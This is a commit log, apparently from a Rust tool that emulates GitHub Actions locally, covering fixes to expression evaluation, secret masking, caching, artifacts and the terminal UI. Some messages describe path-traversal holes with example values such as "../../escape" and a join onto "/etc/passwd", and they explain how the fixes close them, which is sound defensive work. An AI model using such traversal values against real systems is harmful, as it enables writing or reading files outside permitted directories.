* fix(executor): fix review findings — output context, reusable stores, path validation

It turns out that resolve_job_outputs was constructing its
ExpressionContext with an *empty* step_statuses map, so any job
output expression referencing steps.<id>.conclusion would silently
resolve to Null.  Not great when you're trying to emulate GHA
faithfully.

While at it, the reusable workflow paths were each creating their
own ArtifactStore rooted at Path::new(".") instead of reusing the
parent workflow's stores.  This meant artifacts uploaded in a parent
job were invisible to the reusable workflow, and vice versa.  Same
story for inter-job needs context — reusable workflows were passing
empty HashMaps, so multi-job called workflows with `needs:` deps
would get nothing.  Let's fix that.

The matrix output overwrite was a known GHA semantic edge case, but
we were silently clobbering previous combinations' outputs.  Now we
at least warn about it so nobody spends an afternoon debugging why
needs.build.outputs only has values from the last matrix combo.

Also replaced the naive `path.contains("..")` check in cache path
validation with proper Path::components() inspection, because a
directory literally named "..bar" is not a traversal attack.

* fix(executor): close review findings — path traversal, JobStatus duplication, stale plan.md

The download-artifact emulation was joining user-provided `path`
input directly via ctx.working_dir.join() without ever checking
that the result stays inside the workspace. A crafted `with.path`
containing `../` could write artifact files anywhere on disk.

Add canonicalize + starts_with validation matching the pattern
already used in cache.rs. This was the only action emulation path
missing the check — upload-artifact and cache both had it.

While at it, add a Display impl for JobStatus to kill the three
identical match blocks converting status to "success"/"failure"/
"skipped" strings. StepStatus already had this — JobStatus just
got forgotten.

Also remove plan.md (development scratch file that snuck into the
branch), add TODO comments for reusable workflow secret propagation,
and clarify why GitLab pipelines pass empty needs context maps.

* fix(executor): close review findings — masker wiring, loop dedup, cache eviction

The code review flagged six issues ranging from "this will leak
secrets" to "this will eat your disk." Let's go through them.

The ::add-mask:: workflow command was being parsed and then *thrown
away*. The SecretMasker took &mut self for add_secret(), making it
impossible to call through the shared &SecretMasker references
threaded through step execution. Fix this by switching SecretMasker
to interior mutability (RwLock) so add_secret() takes &self. Now
process_workflow_commands() actually wires AddMask values into the
masker. Secrets no longer appear in plain text in output logs.

The step-execution loops in execute_job and execute_matrix_job were
copy-pasted with minor formatting differences — the kind of thing
that drifts apart over time until someone spends a week debugging
why matrix jobs don't process workflow commands the same way as
regular jobs. Extract a StepLoopState struct with a process_outcome
method that handles status recording, logging, command parsing, and
env file application in one place.

The cache at ~/.wrkflw/cache/ had no eviction and no size limit,
which is the kind of optimism I find *alarming* in something that
writes to the user's home directory. Add a 1 GiB cap with LRU
eviction by mtime, triggered automatically after each save.

While at it: fix cache.rs file_name().unwrap_or_default() to return
a proper error instead of writing to an empty filename, fix
artifacts.rs strip_prefix fallback to error instead of silently
using absolute paths, and aggregate reusable workflow outputs into
the parent JobResult instead of always returning an empty map.

14 new tests covering all the above. 292 tests pass, zero failures.

* fix(executor): harden artifact store, masker locks, and cache prefix matching

It turns out that ArtifactStore was happily accepting names like
"../../escape" and joining them directly onto the artifact root
path. That's a path traversal bug. The artifact name comes from
user workflow `with.name`, so *any* workflow could write outside
the artifact directory. Let's not do that.

Added sanitize_artifact_name() that rejects names containing path
separators, "..", null bytes, or leading dots. Both upload() and
download() now validate before touching the filesystem.

While at it, the upload/download methods were async functions that
did nothing but blocking std::fs calls — which blocks the tokio
runtime thread. Wrapped the file I/O in spawn_blocking so we stop
lying about being async.

SecretMasker's RwLock calls all used .unwrap(), which means a
single panic while holding a write guard poisons the lock and
cascades into panics on every subsequent access. Replaced with
.unwrap_or_else(|e| e.into_inner()) so we recover from poisoned
locks instead of bringing down the whole workflow execution.

CacheStore::find_by_prefix was returning whichever entry read_dir
happened to yield first — completely non-deterministic. Now scans
all entries and picks the one with the newest mtime, which matches
GitHub Actions' behavior of preferring the most recently created
matching key.

Also removed an unnecessary clone in StepLoopState::process_outcome
(Skipped arm was using ref + clone when it could just move), and
fixed pre-existing clippy warnings in the secrets crate tests.

* fix(executor): wrap CacheStore I/O in spawn_blocking, add missing tests

CacheStore was doing all its filesystem I/O — recursive directory
copies, eviction scans, the whole shebang — directly on the async
executor thread. ArtifactStore already knew better and used
spawn_blocking. CacheStore just... didn't. Let's fix that.

Make CacheStore Clone and move restore/save into async wrappers
that offload the real work to spawn_blocking. The internal logic
is unchanged, just properly sequestered where it won't block the
Tokio runtime.

While at it, document the cache save-on-miss divergence from real
GitHub Actions (we save eagerly; GHA uses a post-step hook), add
a proper doc comment explaining the RwLock poison recovery strategy
in SecretMasker, and add unit tests for build_needs_context and
resolve_job_outputs that were previously untested.

* fix(executor): close silent failure modes found in PR review

Four things came out of the review that were all variations of the
same theme: "something goes wrong and nobody hears about it."

The cache restore task was swallowing panics via `.ok()?`, which is
a lovely way to make debugging impossible. Match the error handling
pattern already used in save() — log the panic, return None.

The GITHUB_OUTPUT write for cache-hit was using `let _ =` to discard
I/O errors. This was the *only* silent error discard in the entire
module, which makes it feel less like a deliberate choice and more
like an oversight. Log the failure instead.

`secrets: inherit` on reusable workflows was silently ignored because
the code only handled the mapping case and inherit comes through as
a bare string. Emit an explicit warning so users know their secrets
aren't actually being inherited yet.

While at it, replace `&line[2..]` with `strip_prefix("::")` in the
workflow command parser. The starts_with check above guarantees
safety, but direct byte indexing is fragile and strip_prefix says
what it means.

* fix(executor): fix atomicity, eager save, and untested eviction

Three bugs found during PR review, all quietly waiting to bite
someone:

1. SecretMasker::add_secret() was doing two separate RwLock
acquisitions — one for secret_cache, one for secrets. A concurrent
mask() call between the two writes sees inconsistent state. The fix
is embarrassingly simple: put both collections behind a *single*
RwLock<SecretData>. One lock, one write, no window.

2. The actions/cache emulation was saving eagerly on cache miss,
right there in the step. Real GitHub Actions saves in a post-step
hook that only runs *after all steps complete* and *only if the job
succeeded*. Our eager save could persist stale or incomplete data
into ~/.wrkflw/cache/ and poison future runs. Defer saves into a
Mutex<Vec<PendingCacheSave>> on the step context, flush at
end-of-job conditional on success.

3. The eviction test was, shall we say, *aspirational*. It created
two tiny entries well under the 1 GiB limit, then asserted both
still existed. That's not testing eviction, that's testing storage.
Make max_size configurable on CacheStore, set it to 30 bytes in the
test, and actually verify the oldest entry gets evicted.

* fix(executor): close reusable workflow secrets gap, wire matrix env substitution

The reusable workflow path was passing `None, None` for
secret_manager and secret_masker into child execute_job_batch
calls.  This meant that `${{ secrets.* }}` expressions inside
called workflows resolved to null even when the parent had
explicitly passed secrets via the `secrets:` mapping.

That's... not great.  Pass the parent's secret_manager and
secret_masker through so secrets actually work in reusable
workflows.

While at it, the matrix job path had a lingering TODO where
job-level env values like `MY_VAR: ${{ matrix.os }}` were
inserted raw without expression substitution.  Wire up
preprocess_expressions with the matrix combination context so
these actually resolve.  Collect resolved values before
insertion to dodge the borrow checker, which rightfully
complains about mutating job_env while reading from it.

Also add a fast-path to CacheStore::find_by_prefix that checks
the exact key hash before scanning the entire cache directory,
and add integration tests that exercise the artifact upload/
download, cache miss-defer-flush-restore, needs.* context,
step outcome/conclusion, and secrets.* expression paths through
the actual execution wiring — not just the isolated helpers.

* fix(executor): close security holes and correctness bugs from review

The code review turned up some genuinely scary stuff. Let's go
through it.

The artifact download had an unwrap_or(&file_path) fallback that
meant if strip_prefix failed for *any* reason, we'd pass the
absolute file path to Path::join — which silently replaces the
base. So target.join("/etc/passwd") gives you "/etc/passwd".
That's an arbitrary file write. Not great.

The upload side was also doing strip_prefix against the
non-canonical workspace path while the security filter used the
canonical one. Inconsistent canonicalization is how you get path
traversal bugs. Use canonical paths for both.

success() was implemented as `job_status != "failure"`, which
means it returns true when the job is *cancelled*. In real GHA,
success() and cancelled() are mutually exclusive. This also meant
both could be true simultaneously, which is just nonsensical.

The workflow command parser had no URL-decoding at all. GHA
percent-encodes newlines, colons, and percent signs in command
values. Without decoding, ::add-mask:: masks the encoded form
while the actual secret appears unmasked in logs. That's a secret
leak.

Condition evaluation was defaulting to true on parse errors,
silently running steps that should be skipped. A typo in an if:
condition should not mean "yes please run this." Default to false.

secrets: inherit was logging a "not yet supported" warning and
then doing absolutely nothing. Now it actually propagates the
parent secrets to the child workflow, which is what it's supposed
to do.

While at it: filter .cache_key metadata from cache restore,
remove the phantom jobs.*.result context that doesn't exist in
real GHA, make aggregate_reusable_workflow_outputs deterministic,
fix walk_files silently swallowing errors, reject empty
set-output/save-state names, add missing annotation fields, and
stop preprocess_with_value from returning raw ${{ }} templates
on error.

* fix(executor): fix decode ordering, multi-path cache, and missing tests

The decode_value() function in workflow_commands.rs was decoding %25
(percent) *first* in the replacement chain. This means an input like
%250A would first become %0A, and then the next replacement would
happily turn that into a newline. Classic double-decode bug — the
kind of thing that looks correct until someone actually sends a
literal percent sign through the system.

Move %25 decoding to the *end* of the chain, matching what GitHub
Actions actually does.

While at it, actions/cache's `path` input supports multiple
newline-separated paths (e.g. "node_modules\n~/.npm"), but we were
passing the raw multi-line string as a single path. The second path
would just silently not get cached. Fix this by splitting on
newlines and saving/restoring each path independently. The cache
store now uses a composite (key, path) hash so multiple paths under
the same key don't stomp on each other.

Also add the tests that should have been there from the start:
download-artifact path traversal rejection, download-all-artifacts
flow, cache empty key/path validation, cache multi-path deferred
save, and the double-decode regression test.

* fix(executor): close correctness, security, and async safety gaps from review

The PR review turned up a frankly embarrassing number of issues
across the GHA emulation stack. Let's go through the highlights.

The expression evaluator had *multiple* correctness bugs: toJSON()
was emitting unescaped strings (producing invalid JSON), format()
was doing sequential replacements so arg content could be consumed
by later placeholders, fromJSON() was using trim_matches('"')
which strips quotes greedily from both ends, and github.event.*
nested context access silently returned Null because of an overly
strict parts.len() == 2 guard. All fixed.

The secret masker was leaking the first and last characters of
every secret longer than 8 bytes. This is not how you do secret
masking. Replaced with fixed *** output matching GHA behavior.
Also fixed byte/char length confusion on multi-byte secrets,
sorted secrets longest-first to handle overlapping matches, and
added the missing aws_secret and api_key checks to
has_secret_patterns().

Three std::process::Command calls in the Rust action handler were
blocking the tokio runtime. Under parallel matrix execution this
would starve the thread pool. Replaced with tokio::process::Command.

Cache saves were non-atomic — if the process died mid-copy, both
old and new entries were lost. Now writes to a .tmp dir first and
renames into place. While at it, made all .cache_key references
use the CACHE_KEY_METADATA_FILE constant instead of hardcoding the
string in three places.

Other fixes: workflow command parser was trim()ing lines (GHA only
recognizes commands at column 0), INPUT_* env vars were being
logged in verbose output without masking, local reusable workflow
paths had no traversal validation, artifact names with null bytes
were silently stripped instead of rejected, hashFiles() wasn't
checking for symlink traversal, and workflow_commands was
unnecessarily pub.

* fix(executor): fix UTF-8 corruption in expression tokenizer and format()

It turns out the expression tokenizer was storing its input as `&[u8]`
and happily casting individual bytes to `char` via `u8 as char`. This
works fine for ASCII, which is *most* of what GHA expressions contain.

But the moment someone puts a multi-byte UTF-8 character inside a
string literal — say, `format('{0} → {1}', 'a', 'b')` — each byte
of `→` (0xE2 0x86 0x92) gets treated as a separate Latin-1 character.
The arrow becomes `â\u{86}\u{92}`. Not great.

The same bug existed in the `format()` builtin, which iterated
`fmt.as_bytes()` and did the same `u8 as char` dance.

Fix both: change the `Tokenizer` to store `&str` instead of `&[u8]`,
use proper char-aware iteration in `read_string()` (advancing by
`ch.len_utf8()` instead of always 1), and rewrite the `format()`
replacement loop to use `char_indices()`. All the ASCII-only paths
(operators, identifiers, numbers) still use byte-level access since
they only care about ASCII — no performance regression there.

While at it, fix an unnecessary `String::clone` per comparison in
`aggregate_reusable_workflow_outputs` where `sort_by_key` was
cloning the key string. `sort_by(|a, b| a.0.cmp(b.0))` does the
same thing without the allocation.

* refactor(executor): introduce JobServices struct, fix async mutex misuse

The review found that every function in the job/step execution
hierarchy was threading 5-6 individual parameters (secrets_context,
needs_context, needs_results, artifact_store, cache_store) through
their signatures, leading to 15+ argument functions peppered with
#[allow(clippy::too_many_arguments)].

This is not great.

Introduce a JobServices<'a> struct that groups those five fields
into a single borrowing container. JobExecutionContext,
MatrixExecutionContext, and StepExecutionContext all now carry a
`services: JobServices<'a>` instead of five separate fields. The
net result is ~20 fewer lines despite adding a new struct, because
the call sites got dramatically simpler.

While at it, fix the pending_cache_saves Mutex: it was using
std::sync::Mutex in async context. It worked *only* because the
lock was never held across an await point, but that's the kind of
thing that breaks silently the moment someone adds an await inside
the critical section. Switch to tokio::sync::Mutex so the compiler
will actually stop you from doing something stupid.

Also improve CacheStore::new() to fall back to $HOME when
dirs::home_dir() returns None (hello, minimal Docker containers),
and document the github.event.* env-var approximation limitation
in expression.rs so nobody has to rediscover it the hard way.

* fix(executor): address review findings — cache safety, mask perf, missing tests

The cache save_inner claimed to do an "atomic swap" via remove_dir_all
followed by rename. It turns out that two operations are not, in fact,
one operation. If the process dies between the remove and the rename,
the cache entry is just *gone* and the temp dir is orphaned.

Fix the save path to rename-aside-then-swap: old entry goes to `.old`,
`.tmp` renames into place, then `.old` gets cleaned up. Still not truly
atomic (POSIX doesn't give us that for directories), but the window
where the entry is absent is now minimal rather than guaranteed.

While at it, fix three other review findings:

- SecretMasker::mask() was cloning and sorting all secret pairs on
  *every single call*. Cache the sorted pairs behind an Option that
  invalidates on mutation. The read-path fast-path avoids the write
  lock entirely.

- evaluate_condition_with_context now says "failed to parse" instead
  of "failed to evaluate" when a condition errors, so users can
  actually tell the difference between "your condition is false" and
  "your condition is broken syntax and we're skipping your step."

- aggregate_reusable_workflow_outputs silently overwrote colliding
  keys from different jobs. Now it warns when that happens, because
  non-deterministic output clobbering deserves at least a log line.

Add unit tests for build_needs_context filtering, output key collision
behavior, and empty-input edge cases.

* fix(executor): close correctness, perf, and architecture gaps from review

The PR review turned up a nice collection of things that were either
wrong, wasteful, or unnecessarily messy. Let's go through them.

current_dir().unwrap_or_default() in execute_matrix_job was silently
producing an empty PathBuf on failure, which would then quietly
poison every expression resolution downstream. That's not error
handling, that's *wishful thinking*. Propagate the error properly.

toJSON() had hand-rolled string escaping that missed control chars,
null bytes, and who knows what else. We already depend on serde_json
— just use serde_json::to_string() like a normal person.

SecretMasker::mask() was deep-cloning the entire sorted_pairs Vec on
every single call. With 100 secrets that's ~6KB of allocation per
log line. Wrap it in Arc so the clone is an atomic refcount bump.

pending_cache_saves used tokio::sync::Mutex despite never being held
across an await point. Switch to std::sync::Mutex — no async overhead
for what is fundamentally a synchronous lock-push-unlock pattern.

resolve_job_outputs was silently swallowing expression evaluation
errors and returning empty strings. Now it logs a warning so you
at least have a prayer of debugging broken output references.

The local-file and remote-file branches of execute_reusable_workflow_job
had ~80 lines of duplicated code for env setup, secrets propagation,
batch execution, and result aggregation. Extract run_called_workflow()
so we stop maintaining the same logic in two places that will
inevitably diverge.

While at it, fold secret_manager and secret_masker into JobServices
to reduce the parameter sprawl. Mark with_mask_char as #[cfg(test)]
since create_mask always produces "***". Add tests for toJSON with
control chars, multi-path cache restore, and missing step references.

* fix(executor): close review findings — decode gaps, path hardening, refactor

The PR review caught several real issues that needed addressing.

First, decode_value() in the workflow commands parser was missing
%2C (comma) and %3B (semicolon) from its percent-decoding table.
GitHub Actions encodes these in command parameter values, so any
annotation with a comma in the file path would silently corrupt
the value. Not great when your whole job is to parse these things.

Second, the download-artifact path traversal check was using
unwrap_or_else on a failed canonicalize of the *workspace itself*,
falling back to a potentially-relative path as the safety baseline.
If the workspace path was somehow non-canonical, the starts_with
check becomes meaningless. Now it rejects outright if the workspace
can't be canonicalized.

Third, add_secret was using chars().count() for the min_length
check, which counts Unicode scalar values rather than bytes. This
was an unintentional behavior change from the original len() — a
2-char emoji string at 8 bytes would get rejected despite being
substantial. Reverted to len().

While at it, extracted the three inline action handlers
(upload-artifact, download-artifact, cache) from the 300+ line
execute_step match chain into dedicated handle_* functions. The
function was getting *unwieldy* and this makes each handler
independently testable.

Added tests for: condition parse-error → false behavior change,
format() out-of-bounds placeholders, format() no double-substitution,
%2C/%3B decoding, download-all with empty store, and
process_workflow_commands edge cases.
2026-04-06 20:14:32 +05:30
Gokul
0cb27a5484 fix(executor): propagate step outputs and resolve env expressions in composite actions (#87)
* fix(executor): propagate step outputs and resolve env expressions in composite actions

It turns out that execute_composite_action was passing an *empty*
step_outputs map to every single composite step. So when
dtolnay/rust-toolchain step 1 wrote toolchain=stable to
GITHUB_OUTPUT, step 6 asked for ${{ steps.parse.outputs.toolchain }}
and got... nothing. Confusion ensues.

But wait, there's more. Step env values containing ${{ }} expressions
(like `toolchain: ${{inputs.toolchain}}`) were never run through the
expression evaluator either. They were shoved into the environment
as literal strings. So the shell variable $toolchain ended up being
the literal text "${{inputs.toolchain}}", which bash was *not*
thrilled about.

Two fixes: (1) maintain a composite_step_outputs map and call
apply_step_environment_updates after each composite step, exactly
like normal job execution already does, and (2) run
preprocess_expressions on step env values before inserting them.
Both of these should have been there from the start.

* fix(executor): detect local composite actions in prepare_action

It turns out that prepare_action() never actually *checked* whether
a local action (uses: ./) was composite. If there was no Dockerfile
it just shrugged and returned PreparedAction::Image("node:20-slim"),
which meant every local composite action silently fell through to
the "echo 'Local action executed'" placeholder.

The composite detection code only existed in the *remote* action
resolution path, so local composite actions were completely broken.
All that nice step-output propagation work? Never reached.

Parse action.yml in the local-action branch and return
PreparedAction::Composite when runs.using == "composite". This is
the same check the remote path already does via action_resolver.

* fix(executor): appease clippy approx_constant lint in test

Using 3.14 as a test value triggers clippy's approx_constant lint
because it's too close to std::f64::consts::PI. Changed to 3.15
which tests the exact same formatting path without making clippy
throw a fit about mathematical constants.

* refactor(executor): hoist action.yml parsing in prepare_action

The local-action branch of prepare_action had the exact same
four-line read-and-parse block copy-pasted in both the Dockerfile
and non-Dockerfile paths. Two copies of the same code, doing the
same thing, for no reason.

Move the action.yml/action.yaml parsing above the Dockerfile
existence check so both branches share a single `definition`
binding. Same behavior, less duplication, one fewer place to
forget to update when something inevitably changes.
2026-04-03 16:09:24 +05:30
Gokul
975b340f13 feat(executor): add GitHub Actions expression evaluator (#86)
* feat(executor): add GitHub Actions expression evaluator

Add a full expression evaluator for GitHub Actions `${{ }}` syntax,
replacing the regex-only substitution that failed on complex expressions
like those in dtolnay/rust-toolchain.

- Add `inputs.*`, `github.*`, `runner.*` context substitution patterns
- Build recursive-descent expression evaluator with support for:
  - Operators: `==`, `!=`, `<`, `<=`, `>`, `>=`, `&&`, `||`, `!`
  - String/number/boolean/null literals with GHA-compatible truthiness
  - Context resolution: inputs, env, github, runner, matrix, steps
  - Built-in functions: contains, startsWith, endsWith, format,
    success, failure, always, cancelled
- Integrate evaluator into substitution pipeline for complex expressions
- Replace hardcoded `evaluate_job_condition` with evaluator for `if:`
- Add missing RUNNER_OS, RUNNER_ARCH, RUNNER_NAME env vars
- Add catch-all fallback to prevent bash "bad substitution" errors

* fix(executor): fix correctness bugs in expression evaluator

The expression evaluator landed with a few landmines worth defusing
before they bite someone in production.

First, the EXPRESSION_FALLBACK regex used [^}]* to match expression
content, which breaks the *moment* someone uses format placeholders
like {0} inside an expression. The single } in {0} would terminate
the match early, producing garbage. Fix the regex to
(?:[^}]|\}[^}])* so it only stops at the actual }} delimiter.

Second, NaN was truthy. In IEEE 754, NaN != 0.0 is true, so
is_truthy() would happily report NaN as truthy. GitHub Actions
disagrees. Add !n.is_nan() to match the spec. While at it, guard
to_output_string() with n.is_finite() before the as-i64 cast to
prevent overflow on non-finite values.

Third, preprocess_fallback was dead code — evaluate_remaining_
expressions completely replaced its role in the pipeline. Remove it
and its tests rather than leaving a function that exists only to
confuse future readers.

* refactor(executor): route all expressions through the evaluator

The expression evaluator was added in 2954b05, but it only handled
"complex" expressions as a fallback. Simple context references like
${{ env.FOO }} and ${{ runner.os }} were still resolved by six
separate regex preprocessors — each duplicating context resolution
logic that the evaluator already handles perfectly well.

This is the kind of redundancy that makes you maintain the same
mapping in two places and then wonder why they drift apart.

Rip out the individual regex preprocessors (preprocess_env_context,
preprocess_inputs_context, preprocess_github_context,
preprocess_runner_context, preprocess_step_outputs, and five regex
patterns). Now preprocess_expressions does exactly two things:
resolve hashFiles() (needs filesystem access), then route *all*
remaining ${{ }} through the expression evaluator. Net -46 lines.

While at it, fix three issues from code review:

- Add debug logging when expression evaluation fails in the
  substitution path, instead of silently swallowing the error
- Document the surprising Bool/String coercion in expr_eq (where
  false == "random" is true per GitHub Actions semantics)
- Add test coverage for that coercion edge case
2026-04-03 13:07:36 +05:30
Gokul
f650f5533c feat(ui): overhaul TUI and CLI output (#85)
* feat(ui): overhaul TUI and CLI output for professional look

The terminal UI looked like it was thrown together during a
hackathon. Colors were hardcoded across 11 files with zero
consistency — Color::Green here, Color::Cyan there, emoji like 
and  mixed with Unicode symbols like ○ and ⟳, tab dividers
using a raw pipe character. This is not great.

The core problem was the complete absence of any centralized
theming. Every view file was its own little island of ad-hoc
styling decisions, and the non-TUI CLI output had *zero* color
support despite the colored crate sitting right there in the
workspace Cargo.toml, imported by absolutely nobody.

So let's fix all of that:

- Add theme.rs as single source of truth for colors, styles,
  symbols, and block/badge helpers. Every view now imports from
  here instead of hardcoding Color:: literals everywhere.
- Replace the inconsistent emoji zoo (⏭⟳) with proper
  single-cell-width Unicode symbols (✔✖⊘◉○) that don't render
  at double width and break column alignment.
- Upgrade ratatui 0.23 -> 0.28 and crossterm 0.26 -> 0.28,
  migrating all the breaking API changes (Frame generics gone,
  Table::new signature, f.size() -> f.area()).
- Add cli_style.rs and wire colored output through all CLI
  paths — validate, execute, and list commands now have proper
  colored output with tree-style rendering.
- Add braille spinner animation for running workflow states.
- Rip out the redundant instruction headers from workflows and
  logs tabs (the status bar already shows the same hints),
  reclaiming vertical space.
- Clean up the help tab from emoji section headers to properly
  styled underlined headers with fixed-width key columns.

Net result: -418 lines. The UI got *better* and *smaller*.

* fix(ui): replace fragile string-matching in status toast with typed severity

The status bar was detecting success/error toasts by doing
substring matching on the message text — checking for "success",
"Success", and the ✔ symbol. It turns out that any message
containing the word "success" anywhere (even in an error context)
would render with a green background. This is not great.

Add a StatusSeverity enum and a set_success_message() helper so
callers declare intent explicitly instead of hoping their message
text passes a regex-by-vibes check. Also replace the last 
emoji in set_status_message calls and swap the double-width 🔒
(U+1F512) LOCK symbol for single-width ⚿ (U+26BF), because the
whole point of the theme overhaul was to kill double-width emoji.

* fix(ui): align log detection with new Unicode symbols and clean up API

The previous commits replaced all user-facing emoji with single-cell
Unicode symbols, but *forgot* to update the two places that actually
match against those symbols: LogFilterLevel::matches() and
log_processor's type detection.

So we had the delightful situation where cli_style outputs ✖ on
errors, but the log filter is still looking for . The text-based
fallbacks ("Error", "WARN", etc.) masked the breakage, but the
symbol branches were effectively dead code.

While at it, rename set_status_message() to set_error_message()
because a generic "set status" method that silently defaults to
Error severity is a trap waiting to happen. Both existing call
sites are genuine error paths, so the rename is accurate.

Also run cargo fmt across the board -- the previous commits left a
fair amount of unformatted code behind.

* refactor: centralize Unicode symbols into wrkflw-logging

The previous commit introduced a proper theme module with Unicode
symbols for the TUI, but then three different places independently
hardcoded the *same* symbols: theme::symbols, cli_style.rs, and
models/mod.rs. Meanwhile, the executor, runtime, and logging crates
were still happily emitting double-width emoji into log output.

So we had the worst of both worlds: the UI layer had to pattern-
match against *both* old emoji and new Unicode to detect log levels,
and the "single source of truth" for symbols existed in triplicate.
This is not great.

Extract a shared `wrkflw_logging::symbols` module that every crate
already depends on. theme.rs now re-exports it instead of defining
its own copy. cli_style.rs and LogFilterLevel::matches() import
from it. All emoji in executor, runtime, and logging are replaced.
The old fallback in main.rs error filtering is gone because the
executor no longer emits the old symbols.

While at it, expand StatusSeverity with Info and Warning variants
so "no matches found" shows as a yellow warning toast instead of
an angry red error. Because not finding a search result is not an
error, it's just disappointing.

* fix(ui): stop hammering Docker on every render frame

The status bar was calling docker::is_available() on *every single
render tick* — that's 4 times per second, each spawning an OS
thread, a docker subprocess, and a throwaway tokio runtime. The
check has a 3-second timeout, we're calling it every 250ms. This
is not great.

It turns out that under this kind of self-inflicted load, the
check frequently times out and returns false. So Docker shows as
"Unavailable" even when it's sitting right there, perfectly happy.
The double-nested with_stderr_to_null wrapping wasn't helping
either.

While at it, the logging crate was also cheerfully eprintln!()-ing
warnings while the TUI had the terminal in raw mode, which is how
you get "Docker is not available" splattered across the middle of
your carefully rendered UI. Confusion ensues.

The fix: cache the availability result in App state, seed it from
the existing startup check, refresh it every 30 seconds in tick(),
and add a quiet_mode flag to the logging crate so it stops writing
to stderr while the TUI owns the terminal. Messages still go into
the log buffer for the Logs tab — they just don't corrupt the
display anymore.
2026-04-03 11:53:30 +05:30
Gokul
4c0f890ba7 docs: clean up READMEs, remove dead files and bloat (#84)
* docs: gut the documentation bloat and remove dead files

The documentation had grown into the kind of sprawling mess where
the same feature gets explained three times in three different
files, none of which agree with each other. The main README alone
was 610 lines of duplicated sections, speculative roadmaps, and
verbose limitation disclaimers that nobody reads.

Remove 12 files that had no business existing: junk test files
(hello.cpp, hello.rs, test.py), duplicate agent configs, a 487-line
Podman testing manual, unused asciinema recordings, and 7MB of
unreferenced GIF files. Merge the useful bits from GITLAB_USAGE.md
into the main README where they belong.

Rewrite the main README from 610 lines down to ~170. Every feature
is mentioned once, in one place, with one example. The crate README
now actually lists all 14 crates instead of pretending secrets
doesn't exist.

Net result: 3,819 lines deleted, 197 added. The documentation now
fits in your head, which is the whole point.

* docs: update crate READMEs for latest features and trim secrets

The crate READMEs were quietly falling behind the actual code. The
executor README didn't mention --job, environment file read-back,
or job-level container directives. The UI README didn't mention job
selection mode or the tui feature flag. The evaluator README didn't
mention composite action input cross-checking.

Meanwhile, the secrets README was 387 lines of documentation for a
crate whose siblings average 25. It had full provider configuration
examples, rate limiting docs, input validation specs, and
benchmarking instructions — all of which belong in rustdoc, not a
README that's supposed to give you a quick overview.

Trim secrets to ~80 lines. Update executor, ui, evaluator, and
wrkflw READMEs to reflect features from PRs #77-#83.
2026-04-02 23:58:51 +05:30
Gokul
6aa0a380f9 feat(executor): add GitHub Actions environment file read-back (#83)
* feat(executor): add GitHub Actions environment file read-back

After each step executes, read back GITHUB_OUTPUT, GITHUB_ENV,
GITHUB_PATH, and GITHUB_STEP_SUMMARY files to enable inter-step
data flow — the single highest-value GHA emulation improvement.

- Add github_env_files module with parser for GHA key-value format
  (simple key=value and multiline heredoc key<<DELIMITER)
- Read GITHUB_OUTPUT after each step, store outputs keyed by step ID
- Merge GITHUB_ENV entries into job env for subsequent steps
- Prepend GITHUB_PATH entries to PATH for subsequent steps
- Add ${{ steps.<id>.outputs.<key> }} expression substitution
- Add ${{ env.<name> }} expression substitution
- Extend StepResult with outputs field for parsed step outputs
- Restructure execute_job() loop to allow job_env mutation between
  steps using deadline-based timeout instead of async block wrapper

* fix(executor): fix env file read-back bugs and deduplicate post-step logic

The previous commit added environment file read-back but had a few
issues that would bite in real workflows.

First, the heredoc parser was checking for `<<` before checking for
`=`, which means a value like `url=https://example.com/path<<EOF`
would be misinterpreted as a heredoc start. The fix is obvious: the
key before `<<` must actually be a valid identifier, not just "any
non-empty string". Add is_valid_identifier() to enforce that.

Second, GITHUB_ENV and GITHUB_PATH files were never truncated between
steps. Since we read and merge their *entire* contents after each
step, step 2 would re-process step 1's entries, causing duplicate
PATH entries to accumulate O(n²) with each step. We already merge
into job_env which is the source of truth — just truncate all three
files after read-back.

Third, the ~25 lines of post-step read-back logic were copy-pasted
between execute_job and execute_matrix_job. Extract into
apply_step_environment_updates() so there's exactly one place to
maintain this.

While at it, add tests for the heredoc ambiguity, unterminated
heredocs, the apply helper, and — most importantly — a multi-step
test that verifies PATH entries don't duplicate across steps.

* fix(executor): remove dead StepResult.outputs field and fix timeout regression

The previous commit added an `outputs: HashMap<String, String>` field
to StepResult, but *never actually populated it* — every single
construction site (all 20 of them) just sets it to HashMap::new().
The real step outputs live in step_outputs_map inside the job loop,
completely bypassing this field.

A dead field that looks like it should contain data is worse than no
field at all. It's a trap for the next person who tries to read step
outputs through the obvious API. Remove it.

While at it, fix two issues in the execute_job timeout refactor:

The pre-loop `remaining.is_zero()` check was redundant — passing
Duration::ZERO to tokio::time::timeout already does the right thing.
Having both just produced duplicate log messages.

More importantly, the old timeout handler returned the timeout
reason in JobResult.logs. The refactored version just broke out of
the loop and lost that context entirely. Preserve it.

Also document why clear_step_files intentionally skips
GITHUB_STEP_SUMMARY (it's cumulative across steps in real GHA).

* fix(runtime): fix emulation command execution mangling bash -c scripts

It turns out the emulation runtime was joining the entire command
array into a single string and passing it to `sh -c`. This means
`bash -c <multiline-script>` became `sh -c "bash -c word1 word2
..."`, where sh happily re-split the script into separate words and
bash's -c only got the first one.

The result: every `run:` step *appeared* to succeed (exit 0) but
the actual script body never executed properly. Redirects like
`>> $GITHUB_OUTPUT` were captured by the outer sh instead of the
inner bash, so environment file write-back silently wrote garbage.

Fix this by executing known interpreters (bash, sh, python, pwsh)
directly via Command::new(cmd[0]).args(&cmd[1..]), preserving the
script as a single argument. Unknown commands still fall back to
sh -c for shell builtin and pipeline support. This also collapses
the three separate code paths (simple commands, cargo, fallback)
into one unified path, which is just less code to get wrong.

While at it, fix a second bug in apply_step_environment_updates
where GITHUB_PATH entries would clobber the entire PATH with just
the new entries when job_env had no PATH key yet. Fall back to the
system PATH instead of empty string so subsequent steps can still
find bash. Kind of important.

* fix(runtime): handle absolute interpreter paths and restore CI_PROJECT_DIR substitution

The previous emulation refactor matched command[0] against bare names
like "bash" and "cargo", which means /usr/bin/bash or /bin/sh would
fall through to the sh -c wrapper — silently reintroducing the exact
argument-mangling bug that refactor was supposed to fix.

Extract the basename via Path::file_name() before matching. This is
the obvious thing to do and I'm mildly annoyed it wasn't done the
first time around.

While at it, restore the ${CI_PROJECT_DIR} interpolation in env vars
that got quietly dropped during the three-code-path consolidation.
The old code only special-cased CARGO_HOME, but the real issue is
broader: *any* env var value containing ${CI_PROJECT_DIR} needs
interpolation. The new version handles all of them uniformly.

Also add a comment explaining why composite actions get an empty
step_outputs map — it's intentional (matches GHA scoping rules),
not a TODO someone should "fix" later.

* fix(executor): add timeout enforcement to matrix jobs and clean up review nits

